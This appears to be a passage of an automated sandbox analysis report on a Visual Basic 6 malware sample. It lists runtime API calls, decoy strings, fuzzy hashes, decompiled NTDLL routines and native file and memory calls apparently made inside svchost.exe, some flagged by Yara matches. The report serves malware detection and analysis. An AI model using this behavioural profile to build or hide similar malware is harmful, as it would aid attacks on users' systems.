#652.MSVBVM60(?,?,66106831,660E6C30,660E1929), ref: 00414AF8
__vbaVarTstEq.MSVBVM60(?,?), ref: 00414B14
__vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 00414B27
#539.MSVBVM60(00000002,0000008F,00000086,00000007), ref: 00414B4B
__vbaStrVarMove.MSVBVM60(00000002), ref: 00414B55
__vbaStrMove.MSVBVM60 ref: 00414B5C
__vbaStrCopy.MSVBVM60 ref: 00414B66
__vbaFreeStr.MSVBVM60 ref: 00414B6F
__vbaFreeVar.MSVBVM60 ref: 00414B74
__vbaVarDup.MSVBVM60 ref: 00414B8E
#666.MSVBVM60(?,00000002), ref: 00414B9C
__vbaVarCat.MSVBVM60(?,00008008,?), ref: 00414BBC
__vbaStrVarMove.MSVBVM60(00000000), ref: 00414BC3
__vbaStrMove.MSVBVM60 ref: 00414BCA
__vbaFileOpen.MSVBVM60(00000020,000000FF,00000001,00000000), ref: 00414BD3
__vbaFreeStr.MSVBVM60 ref: 00414BDC
__vbaFreeVarList.MSVBVM60(00000003,00000002,?,?), ref: 00414BEC
#611.MSVBVM60 ref: 00414BF5
__vbaStrMove.MSVBVM60 ref: 00414C00
__vbaPut3.MSVBVM60(00000000,?,00000001), ref: 00414C0A
__vbaFreeStr.MSVBVM60 ref: 00414C13
__vbaFileClose.MSVBVM60(00000001), ref: 00414C17

Strings

\TUN5jvHxLZYIkcVn6S8g8Zy7vgIRN6j34, xrefs: 00414BAE
tmp, xrefs: 00414B80
Rebukeful4, xrefs: 00414B06

Memory Dump Source

Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __vba$Free$Move$FileList$#539#611#652#666CloseCopyOpenPut3
String ID: Rebukeful4$\TUN5jvHxLZYIkcVn6S8g8Zy7vgIRN6j34$tmp
API String ID: 1642154090-2505050908
Opcode ID: fea7da68f66a83f01a54455ec8a34ee24f470dbb18a356f4324886dd26b7fb61
Instruction ID: db7d2b6c2fd00e66f80999167363a440dad08cd3fdb0f31befbf95a8ee7b4795
Opcode Fuzzy Hash: fea7da68f66a83f01a54455ec8a34ee24f470dbb18a356f4324886dd26b7fb61
Instruction Fuzzy Hash: C851EDB1D002099FDB04DFA4D948ADEBBB8FF48704F10C12AE616B72A0EB745549CF65

Uniqueness

Uniqueness Score: -1.00%

Function 004161C0, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60 ref: 00416221
#520.MSVBVM60(?,?), ref: 0041622F
__vbaStrVarMove.MSVBVM60(?), ref: 00416239
__vbaStrMove.MSVBVM60 ref: 00416244
__vbaStrCopy.MSVBVM60 ref: 00416252
__vbaFreeStr.MSVBVM60 ref: 00416257
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00416267
__vbaVarDup.MSVBVM60 ref: 00416284
#520.MSVBVM60(?,?), ref: 00416292
__vbaStrVarMove.MSVBVM60(?), ref: 0041629C
__vbaStrMove.MSVBVM60 ref: 004162A7
__vbaStrCopy.MSVBVM60 ref: 004162B5
__vbaFreeStr.MSVBVM60 ref: 004162BA
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004162CA
__vbaErrorOverflow.MSVBVM60 ref: 0041631D

Strings

GRADEREDE, xrefs: 00416276
Turkess9, xrefs: 00416213

Memory Dump Source

Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __vba$FreeMove$#520CopyList$ErrorOverflow
String ID: GRADEREDE$Turkess9
API String ID: 2203838927-1635620145
Opcode ID: f922caacb578ad27f238f49bf2f18ba6fbafca460e03e33c49d96f222ced262d
Instruction ID: 6b1be014e87011149bd0f186f78072c4e5c91de26541e0d2c19a23d7535a914c
Opcode Fuzzy Hash: f922caacb578ad27f238f49bf2f18ba6fbafca460e03e33c49d96f222ced262d
Instruction Fuzzy Hash: 6551E9B1D00209EBDB04DFA4D989ADEBFB8FF08740F14412AE506B7290E7749589CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004157B0, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 004157FF
#598.MSVBVM60 ref: 00415801
#519.MSVBVM60(KUVERTEN), ref: 0041580C
__vbaStrMove.MSVBVM60 ref: 0041581D
__vbaStrMove.MSVBVM60(000000F2,?), ref: 0041583F
#631.MSVBVM60(00000000), ref: 00415842
#528.MSVBVM60(?,?), ref: 0041585A
#520.MSVBVM60(?,?), ref: 00415868
__vbaStrVarMove.MSVBVM60(?), ref: 00415872
__vbaStrMove.MSVBVM60 ref: 0041587D
__vbaStrCopy.MSVBVM60 ref: 0041588A
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041589A
__vbaFreeVarList.MSVBVM60(00000004,00000002,00000008,?,?), ref: 004158B2
__vbaFreeStr.MSVBVM60(004158FC), ref: 004158F5

Strings

2, xrefs: 0041582E
KUVERTEN, xrefs: 00415807

Memory Dump Source

Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __vba$Move$Free$CopyList$#519#520#528#598#631
String ID: 2$KUVERTEN
API String ID: 860267153-160717622
Opcode ID: 123c800655cb1eca3d9d214644a12ee5cb0d15e97495fcd629df4a15f09c58eb
Instruction ID: 04481c4492307c2e4da7a75cfd4f4fa401a31a651229871e0efee2cbbbd0db22
Opcode Fuzzy Hash: 123c800655cb1eca3d9d214644a12ee5cb0d15e97495fcd629df4a15f09c58eb
Instruction Fuzzy Hash: 5F31D6B1C10229EFCB04DFD4DD89AEEBBB8FB58700F10412AE506B7660DB745649CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004046AB, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 87COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60(660E6BEC,660E6C30,660E1929), ref: 00414D03
#607.MSVBVM60(?,00000064,?), ref: 00414D13
__vbaStrVarMove.MSVBVM60(?), ref: 00414D1D
__vbaStrMove.MSVBVM60 ref: 00414D24
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00414D30
#709.MSVBVM60(Shammock6,Amerindians9,000000FF,00000000), ref: 00414D47
#525.MSVBVM60(0000004C), ref: 00414D54
__vbaStrMove.MSVBVM60 ref: 00414D5F
#512.MSVBVM60(Eneboerskens,00000090), ref: 00414D6B
__vbaStrMove.MSVBVM60 ref: 00414D76
__vbaStrCopy.MSVBVM60 ref: 00414D7D
__vbaFreeStr.MSVBVM60 ref: 00414D86
#586.MSVBVM60(00000000,403B0000), ref: 00414D93
__vbaFreeStr.MSVBVM60(00414DE6,660E6BEC,660E6C30,660E1929), ref: 00414DDE
__vbaFreeStr.MSVBVM60 ref: 00414DE3

Strings

Eneboerskens, xrefs: 00414D66
Amerindians9, xrefs: 00414D3D
Shammock6, xrefs: 00414D42

Memory Dump Source

Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __vba$FreeMove$#512#525#586#607#709CopyList
String ID: Amerindians9$Eneboerskens$Shammock6
API String ID: 1315283285-3851144993
Opcode ID: c9dd4a38ba157faaa47100beacb548a53905960dac2a79cc83deab82bf41e1f7
Instruction ID: 47d39b2c0a556e7bda706f640f223120ad4fb53459ba33679d4ace5d1b409952
Opcode Fuzzy Hash: c9dd4a38ba157faaa47100beacb548a53905960dac2a79cc83deab82bf41e1f7
Instruction Fuzzy Hash: C2315070E00209EFC714DFA4DA49BDEBBB4BB48300F10812AE516B36A0EB746545CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00416080, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(66106DF6,00000000,00000008), ref: 004160BD
__vbaNew2.MSVBVM60(004029E8,0041746C), ref: 004160D5
__vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,0000004C), ref: 004160FA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402E68,00000028), ref: 0041611A
__vbaFreeObj.MSVBVM60 ref: 00416123
#610.MSVBVM60(?), ref: 0041612D
#552.MSVBVM60(?,?,00000001), ref: 0041613D
__vbaVarMove.MSVBVM60 ref: 0041614F
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041615F
__vbaFreeStr.MSVBVM60(0041619D), ref: 00416196

Strings

(j, xrefs: 00416168

Memory Dump Source

Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __vba$Free$CheckHresult$#552#610CopyListMoveNew2
String ID: (j
API String ID: 3895108431-2984457235
Opcode ID: 50359d3aede29a9258f2cfe025930269be6902b3e7c9ff1c2784c1a9d9bcee1f
Instruction ID: 387e478afc37953dee3ba1256613bb58365750a7dad4cec7652f5c879b654742
Opcode Fuzzy Hash: 50359d3aede29a9258f2cfe025930269be6902b3e7c9ff1c2784c1a9d9bcee1f
Instruction Fuzzy Hash: D5313E71D40205ABCB04DFA5DD49EEEBBB8EF58701F10802AF511B72A0D7786549CF99

Uniqueness

Uniqueness Score: -1.00%

Function 1EAF645B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E1EAF645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1ebbd360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1EB0FA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E1EAE2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1EADFFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1ebbb1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1EB0B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x1eaf645b
0x1eaf6463
0x1eaf646d
0x1eaf6475
0x1eaf647a
0x1eaf647e
0x1eaf6480
0x1eaf648c
0x1eaf6490
0x1eaf6495
0x1eaf6498
0x1eaf649b
0x1eaf649f
0x1eaf64a1
0x1eb37c07
0x1eb37c09
0x1eb37c0c
0x00000000
0x1eaf64a7
0x1eaf64a7
0x1eaf64aa
0x1eb37bf7
0x1eb37c00
0x00000000
0x1eb37bf9
0x1eb37bf9
0x1eb37bf9
0x1eaf64b0
0x1eaf64b0
0x1eaf64b2
0x1eaf64b2
0x1eaf64b3
0x1eaf64ba
0x1eaf6553
0x1eaf655e
0x1eaf6566
0x1eaf656c
0x1eaf6575
0x1eaf657f
0x1eaf6585
0x1eaf6588
0x1eaf6588
0x1eaf64c7
0x1eaf64cb
0x1eaf64ce
0x1eaf64d3
0x1eaf64da
0x1eaf64e5
0x1eaf64ed
0x1eaf64f1
0x1eaf64f5
0x1eaf64f6
0x1eaf64fa
0x1eaf6502
0x1eaf6503
0x1eaf6504
0x1eaf6507
0x1eaf651a
0x1eaf6524
0x1eaf6524
0x1eaf6526
0x1eaf6526
0x1eaf64aa
0x1eaf652c
0x1eaf652d
0x1eaf652e
0x1eaf6539

APIs

RtlDebugPrintTimes.NTDLL ref: 1EAF651A

Strings

0, xrefs: 1EAF64FA
0, xrefs: 1EAF64E5

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 89d86f3caa8b22eff3e3774be82ef6f6d76c6f4924cc7115e2f5471372598379
Instruction ID: db8154aa213e10925e9883adea4d253a0c18e3bdf78601f324b20ec92920cf9c
Opcode Fuzzy Hash: 89d86f3caa8b22eff3e3774be82ef6f6d76c6f4924cc7115e2f5471372598379
Instruction Fuzzy Hash: 2B4137B16087469FC300CF28C584A1ABBE5FB89714F144A6EF988DB301D731EA45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 1EB5FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E1EB5FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E1EB0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E1EB55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E1EB55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x1eb5fdda
0x1eb5fde2
0x1eb5fde5
0x1eb5fdec
0x1eb5fdfa
0x1eb5fdff
0x1eb5fe0a
0x1eb5fe0f
0x1eb5fe17
0x1eb5fe1e
0x1eb5fe19
0x1eb5fe19
0x1eb5fe19
0x1eb5fe20
0x1eb5fe21
0x1eb5fe22
0x1eb5fe25
0x1eb5fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1EB5FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1EB5FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1EB5FE01

Memory Dump Source

Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true

Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 1c9cf106ec0ea38eaeeda4599ff66bb02d20ff6ea94719bd1c744c69dde5619b
Instruction ID: e4e207875edaaae408015073879bf8233d815206365793df867200454ebd967f
Opcode Fuzzy Hash: 1c9cf106ec0ea38eaeeda4599ff66bb02d20ff6ea94719bd1c744c69dde5619b
Instruction Fuzzy Hash: 6CF0F636500141BFD6200A45DC01F63BF6EEF44730F240355F628563D1DB62F86086F4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 6932 Parent PID: 3352 svchost.exeCOMMON

Executed Functions

Function 02D3867C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02D33BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D33BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02D3861D
NtReadFile.NTDLL(02D33D62,5E972F65,FFFFFFFF,02D33A21,?,?,02D33D62,?,02D33A21,FFFFFFFF,5E972F65,02D33D62,?,00000000), ref: 02D386C5

Strings

.z`, xrefs: 02D38618

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: File$CreateRead
String ID: .z`
API String ID: 3388366904-1441809116
Opcode ID: 6ad7e9cab970f7fbbddcd5f0cbfa2ef953f865721da482d78c9190ff49d4b664
Instruction ID: ac898462af4463453aaa8e7dc36b1322a443ec7f1beebff9474023548376b2ef
Opcode Fuzzy Hash: 6ad7e9cab970f7fbbddcd5f0cbfa2ef953f865721da482d78c9190ff49d4b664
Instruction Fuzzy Hash: 3701F6B2200208ABDB18DF88DC84DEB77ADEF8C754F018249BE4DA3241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D385CD, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02D33BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D33BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02D3861D

Strings

.z`, xrefs: 02D3860D, 02D38618

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 5f1245bfb85d33be96fa6dad0c9d9f0a282bfa7797d1d64eb9a00cb5b9b62ead
Instruction ID: 80425a87e26289f3265c3119eb9de79771c88136f279fd36c605ec98af9768d0
Opcode Fuzzy Hash: 5f1245bfb85d33be96fa6dad0c9d9f0a282bfa7797d1d64eb9a00cb5b9b62ead
Instruction Fuzzy Hash: B301B6B2201208ABCB08CF88DC95DEB77A9EF8C754F158248FA1DA7240C630EC11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D385D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02D33BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D33BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02D3861D

Strings

.z`, xrefs: 02D3860D, 02D38618

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 18062587e4bddab514d0d2e3fa7cf46e035486ec94e013ff7292d915ff858297
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: F0F0B2B2201208ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D38622, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02D33BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D33BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02D3861D

Strings

.z`, xrefs: 02D3860D, 02D38618

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 96e53d9f532eff4e48bee81213216dacc8a9c0eae155110fb7375bb39e440366
Instruction ID: 2c48a997f34b38f4ca18fe4a08d5df8300d93109da6c2ae6ca6058a80c080cd1
Opcode Fuzzy Hash: 96e53d9f532eff4e48bee81213216dacc8a9c0eae155110fb7375bb39e440366
Instruction Fuzzy Hash: 36F0F8B2604149AFCB15CFACD994DDB77BAEF8C300B148649FA8CC7204C631E855CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D38680, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02D33D62,5E972F65,FFFFFFFF,02D33A21,?,?,02D33D62,?,02D33A21,FFFFFFFF,5E972F65,02D33D62,?,00000000), ref: 02D386C5

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: ff768ef484a2d61da5e866d2b640dcc9cf247528c67f6c5cb67f937ba337f711
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: D4F0A9B2200108ABCB14DF89DC94DEB77ADEF8C754F158248BE1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D387AA, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D22D11,00002000,00003000,00000004), ref: 02D387E9

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c6ba5b996d80282ef4d40e939a3623e0c582f228b3eefefef00f5a8c6f0c3eb5
Instruction ID: 754777cd9f12b4ddc21588b24ff3640eac3b5568e2cbfd9f94980d2d19765fe1
Opcode Fuzzy Hash: c6ba5b996d80282ef4d40e939a3623e0c582f228b3eefefef00f5a8c6f0c3eb5
Instruction Fuzzy Hash: 6BF0F8B5201208ABDB14DF99CC84EEB7BA9AF88254F158248FE09A7251C671E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D387B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D22D11,00002000,00003000,00000004), ref: 02D387E9

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: c3e7a0d1b8b0d085eed072c343f0de44fe563374f9165dbcccd4e0b2fcbc5225
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: D0F015B2200208ABCB18DF89CC80EEB77ADEF88750F118148BE08A7241C630F810CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D38700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02D33D40,?,?,02D33D40,00000000,FFFFFFFF), ref: 02D38725

Memory Dump Source

Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 81b51e5293bab0d9e4107c277a50599e4eeb7b04f61f02494a58b986b41531dd
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: BAD012756002146BD714EB98CC45EE7775DEF44750F154455BA185B241C570F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 03A69780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03A6978A

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5e0c1fe9d64efc0e15e74e328e47814e89bbacda97581a11ec05f8664ae04109
Instruction ID: a453ce70747d9644523013041b05991b157098bd128b860e15426eaa27141e51
Opcode Fuzzy Hash: 5e0c1fe9d64efc0e15e74e328e47814e89bbacda97581a11ec05f8664ae04109
Instruction Fuzzy Hash: D890026921304402E180B169584C60A10059BD1242F91D416A0006558CCA5588696371

Uniqueness

Uniqueness Score: -1.00%

Function 03A69FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03A69FEA

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 47cabe9beb6f0f75bd3e69228cef066dbc8b7d87f1c88c530658f61884000802
Instruction ID: f2774c55b48b9a38da34e1ac1cf7d2138abb8305384d87e44f330a99da8cda9c
Opcode Fuzzy Hash: 47cabe9beb6f0f75bd3e69228cef066dbc8b7d87f1c88c530658f61884000802
Instruction Fuzzy Hash: F990027131118802E110A169884870610059BD1241F51C412A0815558D87D588917172

Uniqueness

Uniqueness Score: -1.00%

Function 03A69710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03A6971A

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d6e890668fc587578f835c6c56a80b0bae140b595d36b001053ed141f307a824
Instruction ID: 77f79df155a1e545931f540ad38914c925161fb363533986191680713fad1a3d
Opcode Fuzzy Hash: d6e890668fc587578f835c6c56a80b0bae140b595d36b001053ed141f307a824
Instruction Fuzzy Hash: 6E90027120104802E100A5A9584C64610059BE0341F51D012A5015555EC7A588917171

Uniqueness

Uniqueness Score: -1.00%

Function 03A696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03A696EA

Memory Dump Source

Source File: 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, Offset: 03A00000, based on PE: true

Associated: 00000016.00000002.821610593.0000000003B1B000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 031ebef30c1e922ca0db4c9d3a493dead983ecb4cc7dcc279cf27af94c9a8e28
Instruction ID: 0e728cfbe53f4eeaf03282aad55e1cdffbbad38007502003df8870f85b36c90c
Opcode Fuzzy Hash: 031ebef30c1e922ca0db4c9d3a493dead983ecb4cc7dcc279cf27af94c9a8e28
Instruction Fuzzy Hash: 4A9002712010CC02E110A169884874A10059BD0341F55C412A4415658D87D588917171

Uniqueness

